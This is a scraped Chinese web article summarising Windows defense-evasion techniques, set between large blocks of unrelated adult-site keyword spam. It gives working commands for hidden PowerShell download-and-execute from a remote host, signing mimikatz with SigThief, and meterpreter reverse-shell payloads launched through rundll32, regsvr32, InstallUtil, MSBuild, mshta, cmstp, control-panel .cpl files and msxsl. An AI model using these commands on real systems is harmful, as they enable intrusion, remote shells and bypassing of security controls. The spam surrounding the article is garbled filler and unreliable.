成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久

您的位置:首頁技術文章
文章詳情頁

Windows命令執行防御規避總結

瀏覽:225日期:2022-11-12 13:56:43

今天小編為大家帶來Windows命令執行防御規避總結,具體如下:

Windows命令執行防御規避總結

powershell

powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://xx.xx.xx.xx:8888/logo.gif’))”“ /f

SIP

通過sip劫持對惡意代碼簽名獲得系統信任https://github.com/secretsquirrel/SigThief

python sigthief.py -i consent.exe -t mimikatz.exe -o signed-mimikatz.exe

rundll32.exe

生成

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll 》xxx.dll

目標執行

rundll32.exe shell32.dll,Control_RunDLL xxx.dll

Regsvr32.exe

msfconsole

auxiliary/server/regsvr32_command_delivery_server

set CMD net user test 123456 /add

目標執行

regsvr32 /s /n /u /i:http://xx.xx.xx.xx:8080/aPxOb0o scrobj.dll

InstallUtil.exe

1.編譯后門:

C:WindowsMicrosoft.NETFramework64v4.0.30319》csc.exe /r:System.EnterpriseServices.dll /unsafe /target:library /out:xxx.exe /keyfile:”C:Program Files (x86)Microsoft SDKsWindowsv10.0AbinNETFX 4.8 Toolsx64key.snk“ xxx.cs

2.靶機上運行:

InstallUtil.exe /U xxx.exe

3.msf監聽,得到反彈的shell:

set payload windows/x64/meterpreter/reverse_tcp

set LHOST xx.xx.xx.xx

set LPORT 4444

exploit

Msbuild.exe

MSBuild是Microsoft Build Engine的縮寫,代表Microsoft和Visual Studio的新的生成平臺,MSBuild可編譯特定格式的xml文件

https://github.com/3gstudent/msbuild-inline-task

msf生成shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=4444

-f csharp

使用shellcode替換https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20x64%20shellcode.xml中的shellcode部分

msf監聽

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost xx.xx.xx.xx

set lport 4444

exploit

運行

C:WindowsMicrosoft.NETFrameworkv4.0.30319MSBuild.exe exec64.xml

CMSTP

cmstp.exe /s /ns C:UsersadministratorAppDataLocalTempXKNqbpzl.txt繞過AppLocker并啟動惡意腳本

Mshta.exe

Mshta.exe 是一個執行 Microsoft HTML 應用程序 (HTA) 的實用程序,攻擊者可以使用 mshta.exe 通過受信任的 Windows 實用程序代理執行惡意代碼

use exploit/windows/misc/hta_server

msf exploit(windows/misc/hta_server) 》 set srvhost xx.xx.xx.xx

msf exploit(windows/misc/hta_server) 》 exploit

mshta.exe http://xx.xx.xx.xx:8080/xxxxxxx.hta

控制面板

攻擊者可以使用控制面板項作為有效載荷來執行任意命令,控制面板項是注冊的可執行文件(.exe)或控制面板(.cpl)文件,可以直接從命令行執行或通過Control_RunDLL(API)調用或者直接雙擊文件。

攻擊者構造惡意的dll文件CPIApplet.dll

利用msf生成dll文件:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 -f dll 》 /tmp/CPIApplet.dll

傳入windows機器,然后重命名為CPIApplet.cpl,通過control.exe c:usersadministratordesktopCPIApplet.cpl 執行命令

通過msxsl.exe調用惡意xml文件執行腳本

制作兩個文件

customers.xml

script.xsl

xmlns:xsl=”http://www.w3.org/1999/XSL/Transform“

xmlns:msxsl=”urn:schemas-microsoft-com:xslt“

xmlns:user=”http://mycompany.com/mynamespace“》

function xml(nodelist) {

var r = new ActiveXObject(”WScript.Shell“).Run(”cmd.exe /k calc.exe“);

return nodelist.nextNode().xml;

}

開啟http服務

python3 -m http.server 80

遠程下載執行

msxsl.exe http://xx.xx.xx.xx/customers.xml http://xx.xx.xx.xx/scrip.xsl

標簽: Windows系統
相關文章:
成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久
久久久国际精品| 美女诱惑一区| 亚洲深夜激情| 欧美丰满一区二区免费视频| 日韩精品每日更新| 国产模特精品视频久久久久| 国产精品情趣视频| 你懂的视频一区二区| 日韩一区二区三区在线| 久久66热偷产精品| 男人的天堂亚洲| 一区二区三区国产精华| 91久久国产自产拍夜夜嗨| 中文字幕一区二区三区不卡在线| 欧美一区免费视频| 欧美va亚洲va在线观看蝴蝶网| 国产精品亚洲第一区在线暖暖韩国| 欧美日韩视频专区在线播放| 久久精品国产亚洲5555| 欧美日韩国产乱码电影| 精品一区二区三区的国产在线播放| 欧美亚洲综合网| 日本中文字幕一区二区视频| 久久蜜桃资源一区二区老牛| 日韩中文字幕不卡| 色婷婷激情久久| 麻豆高清免费国产一区| 欧美片在线播放| 国产不卡在线视频| 日韩精品一区二区三区swag| 国产成人免费视频网站| 欧美xxxxxxxxx| 99视频一区二区| 久久久精品黄色| 国内揄拍国内精品久久| 国产精品丝袜一区| 亚洲国产精品第一区二区| 亚洲男帅同性gay1069| 国产精品一区亚洲| 亚洲成人激情社区| 香港久久久电影| 亚洲色图自拍偷拍美腿丝袜制服诱惑麻豆| eeuss国产一区二区三区| 2014亚洲片线观看视频免费| 午夜精品免费| 国产精品久久久久久久久免费丝袜| 亚洲精品三级| 日韩成人午夜电影| 在线不卡的av| 91丨九色丨黑人外教| 国产精品国产三级国产普通话蜜臀| 一本色道久久精品| 青青草原综合久久大伊人精品优势 | 欧美亚洲不卡| 亚洲影院在线观看| 在线视频你懂得一区二区三区| 国产麻豆精品一区二区| 精品国产乱码久久久久久闺蜜| 欧美精品成人一区二区在线观看| 亚洲色图.com| 91国偷自产一区二区三区成为亚洲经典| 韩国中文字幕2020精品| 久久一区二区视频| 亚洲高清不卡| 免费视频一区二区| 精品日本一线二线三线不卡| 欧美天堂亚洲电影院在线观看 | 亚洲男人的天堂av| 一本在线高清不卡dvd| 夫妻av一区二区| 亚洲人123区| 欧美日韩你懂得| 欧美日韩国产亚洲一区| 亚洲 欧美综合在线网络| 91精品国产品国语在线不卡| 女女同性精品视频| 舔着乳尖日韩一区| 精品捆绑美女sm三区| 最新国产乱人伦偷精品免费网站| 日韩一区欧美二区| 久久综合色婷婷| 麻豆成人精品| 成人一区二区视频| 亚洲精品中文在线影院| 在线不卡免费欧美| 亚洲国产日韩综合一区| 久久电影网电视剧免费观看| 国产婷婷色一区二区三区| 亚洲综合国产激情另类一区| 国产福利电影一区二区三区| 亚洲人亚洲人成电影网站色| 欧美日韩国产综合一区二区| 欧美私人啪啪vps| 麻豆成人91精品二区三区| 国产拍欧美日韩视频二区| 色婷婷国产精品| 欧美日韩一区二区高清| 日本视频中文字幕一区二区三区| 欧美成va人片在线观看| 久久国产精品毛片| 91片黄在线观看| 奇米一区二区三区av| 国产精品无遮挡| 欧美精品在欧美一区二区少妇| 亚洲亚洲精品三区日韩精品在线视频| 久久超碰97中文字幕| 亚洲天堂网中文字| 日韩欧美在线影院| 先锋亚洲精品| 91在线无精精品入口| 美国十次综合导航| 1024国产精品| 日韩欧美精品三级| 亚洲女人av| 91猫先生在线| 韩国精品久久久| 亚洲v日本v欧美v久久精品| 欧美韩国日本不卡| 欧美精品久久天天躁| 国产女主播一区二区| 欧美二区在线| 国产成人免费视频| 日本中文一区二区三区| 一区二区视频免费在线观看| 欧美成人性战久久| 91久久精品一区二区三区| 激情久久久久久久| 成人h精品动漫一区二区三区| 视频一区视频二区中文字幕| 亚洲欧美综合另类在线卡通| 日韩欧美成人午夜| 欧美天堂一区二区三区| 亚洲高清在线| 91猫先生在线| 成av人片一区二区| 国产精品综合二区| 蜜臀av在线播放一区二区三区| 亚洲精品视频在线| 国产精品入口麻豆九色| 精品sm捆绑视频| 欧美一区二区网站| 欧美吻胸吃奶大尺度电影| 亚洲欧美日韩在线综合| 好看的av在线不卡观看| jlzzjlzz欧美大全| 久久66热偷产精品| 五月综合激情网| 亚洲激情图片小说视频| 欧美国产精品专区| 久久色在线观看| 欧美xxxx老人做受| 日韩欧美区一区二| 日韩女优制服丝袜电影| 7777精品伊人久久久大香线蕉| 色欧美片视频在线观看在线视频| 国产视频一区免费看| 91久久黄色| 狠狠色综合网| 欧美+日本+国产+在线a∨观看| 暴力调教一区二区三区| 成人午夜视频网站| 国产成人在线观看| 国产精品一二三四五| 精品在线观看免费| 久久99国产精品久久| 九色综合国产一区二区三区| 免费成人你懂的| 美国欧美日韩国产在线播放| 免费精品99久久国产综合精品| 亚洲国产成人精品视频| 亚洲一区二区av在线| 亚洲另类色综合网站| 亚洲欧美偷拍另类a∨色屁股| 亚洲国产高清aⅴ视频| 国产日韩精品一区二区三区在线| 久久久久久久久久久久久久久99 | 久久高清国产| 老鸭窝毛片一区二区三区| 亚洲欧美日本国产专区一区| 国产精品亚洲综合久久| 亚洲综合电影一区二区三区| 久久久亚洲人| 在线一区二区三区四区| 欧美色倩网站大全免费| 欧美日韩国产成人在线91| 337p亚洲精品色噜噜狠狠| 日韩一区二区三区电影在线观看| 日韩一区二区视频| 久久日韩粉嫩一区二区三区| 欧美国产成人精品| 亚洲人成网站色在线观看| 一个色综合av| 天天综合网 天天综合色| 日韩av二区在线播放| 久久99久久精品| 国产精品白丝jk白祙喷水网站| 成人中文字幕电影| 97久久精品人人爽人人爽蜜臀 | 久久99国内精品| 成人午夜短视频|